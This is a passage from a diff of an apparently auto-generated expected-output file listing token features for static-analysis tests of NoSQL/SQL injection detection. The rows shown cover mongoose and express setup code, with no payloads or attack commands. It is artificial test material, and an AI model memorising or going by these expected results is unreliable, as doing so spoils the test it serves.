autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:30:131:31 | id | InputAccessPathFromCallee | 0._id.$eq | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:30:131:31 | id | InputArgumentIndex | 0 | @@ -3087,24 +15080,124 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:30:131:31 | id | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:30:131:31 | id | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:131:30:131:31 | id | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:1:1:1:0 | this | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:1:1:1:1 | Document | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:1:1:1:1 | Document | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:1:1:1:1 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:1:1:1:1 | require | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:1:1:1:12 | 'use strict' | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:1:1:1:12 | 'use strict' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:1:1:1:12 | 'use strict' | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:2:7:2:13 | Express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:2:7:2:13 | Express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:2:7:2:13 | Express | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:2:7:2:34 | Express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:2:7:2:34 | Express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:2:7:2:34 | Express | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:2:7:2:34 | Express ... press') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:2:7:2:34 | Express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:2:7:2:34 | Express ... press') | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:2:17:2:23 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:2:17:2:23 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:2:17:2:23 | require | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:2:17:2:34 | exceptional return of require('express') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:2:17:2:34 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:2:17:2:34 | exceptional return of require('express') | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:2:17:2:34 | require('express') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:2:17:2:34 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:2:17:2:34 | require('express') | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:2:25:2:33 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:2:25:2:33 | 'express' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:2:25:2:33 | 'express' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:2:25:2:33 | 'express' | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:2:25:2:33 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:2:25:2:33 | 'express' | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:3:7:3:16 | BodyParser | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:3:7:3:16 | BodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:3:7:3:16 | BodyParser | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:3:7:3:41 | BodyPar ... arser') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:3:7:3:41 | BodyPar ... arser') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:3:7:3:41 | BodyPar ... arser') | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:3:20:3:26 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:3:20:3:26 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:3:20:3:26 | require | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:3:20:3:41 | exceptional return of require ... arser') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:3:20:3:41 | exceptional return of require ... arser') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:3:20:3:41 | exceptional return of require ... arser') | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:3:20:3:41 | require ... arser') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:3:20:3:41 | require ... arser') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:3:20:3:41 | require ... arser') | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:3:28:3:40 | 'body-parser' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:3:28:3:40 | 'body-parser' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:3:28:3:40 | 'body-parser' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:3:28:3:40 | 'body-parser' | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:3:28:3:40 | 'body-parser' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:3:28:3:40 | 'body-parser' | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:4:7:4:14 | Mongoose | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:4:7:4:14 | Mongoose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:4:7:4:14 | Mongoose | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:4:7:4:36 | Mongoos ... goose') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:4:7:4:36 | Mongoos ... goose') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:4:7:4:36 | Mongoos ... goose') | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:4:7:4:36 | Mongoose | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:4:7:4:36 | Mongoose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:4:7:4:36 | Mongoose | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:4:18:4:24 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:4:18:4:24 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:4:18:4:24 | require | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:4:18:4:36 | exceptional return of require('mongoose') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:4:18:4:36 | exceptional return of require('mongoose') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:4:18:4:36 | exceptional return of require('mongoose') | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:4:18:4:36 | require('mongoose') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:4:18:4:36 | require('mongoose') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:4:18:4:36 | require('mongoose') | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:4:26:4:35 | 'mongoose' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:4:26:4:35 | 'mongoose' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:4:26:4:35 | 'mongoose' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:4:26:4:35 | 'mongoose' | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:4:26:4:35 | 'mongoose' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:4:26:4:35 | 'mongoose' | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:5:1:5:8 | Mongoose | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:5:1:5:8 | Mongoose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:5:1:5:8 | Mongoose | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:5:1:5:16 | Mongoose.Promise | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:5:1:5:16 | Mongoose.Promise | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:5:1:5:16 | Mongoose.Promise | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:5:1:5:33 | Mongoos ... Promise | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:5:1:5:33 | Mongoos ... Promise | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:5:1:5:33 | Mongoos ... Promise | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:5:10:5:16 | Promise | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:5:10:5:16 | Promise | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:5:10:5:16 | Promise | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:5:20:5:25 | global | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:5:20:5:25 | global | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:5:20:5:25 | global | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:5:20:5:33 | global.Promise | assignedToPropName | Promise | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:5:20:5:33 | global.Promise | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:5:20:5:33 | global.Promise | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:5:20:5:33 | global.Promise | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:5:27:5:33 | Promise | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:5:27:5:33 | Promise | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:5:27:5:33 | Promise | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:6:1:6:8 | Mongoose | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:6:1:6:8 | Mongoose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:6:1:6:8 | Mongoose | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:6:1:6:16 | Mongoose.connect | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:6:1:6:16 | Mongoose.connect | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:6:1:6:16 | Mongoose.connect | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:6:1:6:51 | Mongoos ... able1') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:6:1:6:51 | Mongoos ... able1') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:6:1:6:51 | Mongoos ... able1') | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:6:1:6:51 | exceptional return of Mongoos ... able1') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:6:1:6:51 | exceptional return of Mongoos ... able1') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:6:1:6:51 | exceptional return of Mongoos ... able1') | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:6:10:6:16 | connect | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:6:10:6:16 | connect | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:6:10:6:16 | connect | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:6:18:6:50 | 'mongod ... table1' | CalleeFlexibleAccessPath | Mongoose.connect | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:6:18:6:50 | 'mongod ... table1' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:6:18:6:50 | 'mongod ... table1' | calleeImports | mongoose | @@ -3112,6 +15205,49 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:6:18:6:50 | 'mongod ... table1' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:6:18:6:50 | 'mongod ... table1' | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:6:18:6:50 | 'mongod ... table1' | receiverName | Mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:8:7:8:9 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:8:7:8:9 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:8:7:8:9 | app | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:8:7:8:21 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:8:7:8:21 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:8:7:8:21 | app | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:8:7:8:21 | app = Express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:8:7:8:21 | app = Express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:8:7:8:21 | app = Express() | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:8:13:8:19 | Express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:8:13:8:19 | Express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:8:13:8:19 | Express | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:8:13:8:21 | Express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:8:13:8:21 | Express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:8:13:8:21 | Express() | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:8:13:8:21 | exceptional return of Express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:8:13:8:21 | exceptional return of Express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:8:13:8:21 | exceptional return of Express() | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:7:10:14 | Document | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:7:10:14 | Document | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:7:10:14 | Document | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:7:10:14 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:7:16:2 | Documen ... ring\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:7:16:2 | Documen ... ring\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:7:16:2 | Documen ... ring\\n}) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:7:16:2 | Document | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:7:16:2 | Document | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:7:16:2 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:18:10:25 | Mongoose | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:18:10:25 | Mongoose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:18:10:25 | Mongoose | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:18:10:31 | Mongoose.model | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:18:10:31 | Mongoose.model | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:18:10:31 | Mongoose.model | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:18:16:2 | Mongoos ... ring\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:18:16:2 | Mongoos ... ring\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:18:16:2 | Mongoos ... ring\\n}) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:18:16:2 | exceptional return of Mongoos ... ring\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:18:16:2 | exceptional return of Mongoos ... ring\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:18:16:2 | exceptional return of Mongoos ... ring\\n}) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:27:10:31 | model | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:27:10:31 | model | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:27:10:31 | model | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:33:10:42 | 'Document' | CalleeFlexibleAccessPath | Mongoose.model | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:33:10:42 | 'Document' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:33:10:42 | 'Document' | calleeImports | mongoose | @@ -3126,6 +15262,15 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:45:16:1 | {\\n t ... tring\\n} | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:45:16:1 | {\\n t ... tring\\n} | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:10:45:16:1 | {\\n t ... tring\\n} | receiverName | Mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:11:5:11:9 | title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:11:5:11:9 | title | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:11:5:11:9 | title | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:11:5:14:5 | title: ... e\\n } | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:11:5:14:5 | title: ... e\\n } | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:11:5:14:5 | title: ... e\\n } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:11:5:14:5 | title: ... e\\n } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:11:5:14:5 | title: ... e\\n } | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:11:5:14:5 | title: ... e\\n } | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:11:12:14:5 | {\\n ... e\\n } | CalleeFlexibleAccessPath | Mongoose.model | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:11:12:14:5 | {\\n ... e\\n } | InputAccessPathFromCallee | 1.title | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:11:12:14:5 | {\\n ... e\\n } | InputArgumentIndex | 1 | @@ -3134,6 +15279,15 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:11:12:14:5 | {\\n ... e\\n } | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:11:12:14:5 | {\\n ... e\\n } | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:11:12:14:5 | {\\n ... e\\n } | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:12:9:12:12 | type | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:12:9:12:12 | type | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:12:9:12:12 | type | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:12:9:12:20 | type: String | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:12:9:12:20 | type: String | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:12:9:12:20 | type: String | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:12:9:12:20 | type: String | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:12:9:12:20 | type: String | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:12:9:12:20 | type: String | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:12:15:12:20 | String | CalleeFlexibleAccessPath | Mongoose.model | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:12:15:12:20 | String | InputAccessPathFromCallee | 1.title.type | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:12:15:12:20 | String | InputArgumentIndex | 1 | @@ -3142,6 +15296,15 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:12:15:12:20 | String | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:12:15:12:20 | String | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:12:15:12:20 | String | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:13:9:13:14 | unique | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:13:9:13:14 | unique | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:13:9:13:14 | unique | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:13:9:13:20 | unique: true | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:13:9:13:20 | unique: true | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:13:9:13:20 | unique: true | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:13:9:13:20 | unique: true | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:13:9:13:20 | unique: true | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:13:9:13:20 | unique: true | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:13:17:13:20 | true | CalleeFlexibleAccessPath | Mongoose.model | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:13:17:13:20 | true | InputAccessPathFromCallee | 1.title.unique | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:13:17:13:20 | true | InputArgumentIndex | 1 | @@ -3150,6 +15313,15 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:13:17:13:20 | true | contextFunctionInterfaces | | | 